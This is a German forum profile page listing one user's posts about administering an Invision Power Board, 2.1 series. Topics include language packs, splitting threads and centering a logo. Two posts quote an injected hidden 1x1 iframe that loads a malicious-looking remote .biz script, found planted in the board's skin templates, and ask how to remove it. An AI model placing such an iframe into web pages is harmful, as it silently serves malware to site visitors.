Jump to content
InvisionCommunity.de - Der Deutsche Invision Community Support

stylus740

Mitglied
  • Content count

    9
  • Joined

  • Last visited

About stylus740

  • Rank
    Frischling

IP.Board Informationen

  • IP.Board Version
    2.1.x
  1. Impressum

    Hmmhh.... Ich habe es per Custom Page gelöst, sieht klasse aus, hier mal der MOD für die 2.2.2 HIER könntest Du mal in wenigen Stichworten erklären, was man machen muss, wenn das Teil installiert ist? Die Anleitung ist etwas spärlich und so ganz blicke ich die neue Einstellung unter Tools & Settings noch nicht.... Wäre nett Bye
  2. [Archiv] [IPB 2.1] Deutsches Sprachpaket

    Hallo, habe mir jetzt eben mal von der Startseite dieses Threads die Zip heruntergeladen... Die Hilfe Dateien sind aber immer noch in englisch, je? Falls ich jetzt nicht die 'falsche' Datei geladen habe: Ist denn da noch mit was deutschem zu rechnen? Bye
  3. Expolit

    So, die Frage 1 ist beantwortet. Folgender Text: <body><iframe src="http://zhmbscwdgk.biz/dl/adv771.php" width=1 height=1></iframe> stand nicht etwa in einem php, sondern wurde letztlich in der mysql db gefunden. Und zwar unter 'look and feel' - 'skin manager' - 'html manager' oder so.... Die Frage, die bleibt: Wie kommt das da rein und was kann man dagegen tun? Bye Stylus740
  4. Expolit

    Hi, wir haben IPB 2.1.7 und seit heute klagen User über eine seltsame emf datei, Viren etc. Die User erleben etwa Folgendes: http://img.photobucket.com/albums/v167/Hastin/ffiexvirus.jpg http://img.photobucket.com/albums/v167/Hastin/iexvirus.jpg (Diese Bilder sind nicht von unserem Board, ich habe sie nur bei der Suche gefunden, ohne dort auch ne Lösung zu finden) Über "Quelltext anzeigen" findet sich folgender Code: </style></head><body><iframe src="http://zhmbscwdgk.biz/dl/adv771.php" height="1" width="1"></iframe> 2 Fragen nun: a) in welcher Datei finde ich vermutlich den Schadcode, der den obigen Link anzeigt? Habe jetzt lang und viel gesucht und vermute fast, dass da irgend was "von hinten durch die Brust ins Auge" programmiert ist oder so.... Ist das Expolit bekannt? Gibt es dagegen einen Fix? Googel suchen nach 'adv771' oder 'zhmbscwdgk' brachten jedenfalls kein wirkliches Ergebnis.... Hoffe, jemand kann mir trotz Sommerhitze weiter helfen Bye
  5. Thema splitten unter 2.xx ??

    Hi, vielen Dank, das wusste ich wirklich nicht, hat mir sehr geholfen! Bye
  6. Hi, irgendwie bin ich zu dämlich oder sehe den Wald vor lauter Bäumen nicht? Ich bekomme es nicht hin, ein Thema zu splitten. Am Ende eines Themas gibt es ja ZWEI Auswahlboxen. In der linken kann ich verschieben, schliessen, löschen etc. Dazu gibt es auch nen OK Button. Und das funktioniertt auch. Aber da gibt es kein "Thema splitten" (oder "teilen") Das gibt es in der rechten Auswahlbox. Und daneben finde ich, "mit der Auswahl ausführen (0)". Aber da ist nix zu klicken. Wegen der 0 vermutlich? Wie auch immer: Ich möchte ein Thema splitten. Kann mir wer das etwas genauer step by step mal erklären? Wäre wirklich nett, ehe ich in die Tastatur beisse ) Bye
  7. [Archiv] [IPB 2.1] Deutsches Sprachpaket

    Hi, Das geht anders: acp - 'Tools & Settings' - 'Board Guidelines' Im 5. Punkt stehen die englischen Texte, die hier nun leicht übersetzt werden können. Kann man hierzu zu wenig englisch: Board suchen, welches Version 2.x nutzt, auf "Register" klicken, hoffen, dass dort der Text schon übersetzt ist, kopieren und im eigenen acp einfügen. Bye
  8. Logo/Banner zentrieren in 2.1.5

    Hi, Danke für dir rasche Antwort und das funktioniert super Diese ganzen neuen Optionen kannte ich noch gar nicht, da man früher für so was im Code rummalen mußte..... Bye
  9. Hallo, Es wurde hier schon mehrfach erklärt, wie das mit dem zentrierten Banner funktioniert, aber das bezog sich halt auf 1.3..... Ich hätte es ganz gerne auch im frisch erworbenen 2.1.5 er Board und irgendwie stimmt da mit den Dateien nichts mit den früheren Erklärungen überein Begriffe wie 'logostrip' und 'logo4.gif' finden sich in der ipb_templates.xml und hier habe ich mal versuchsweise eine center Anweisung reingesetzt: Aber das bewirkt nichts. Entweder vergesse isg was oder versuche an der völlig falschen Stelle zu ändern. Jemand in der werten Leserschaft, der weiß, wie das bei der 2.1.5 Version funktioniert? Bye
×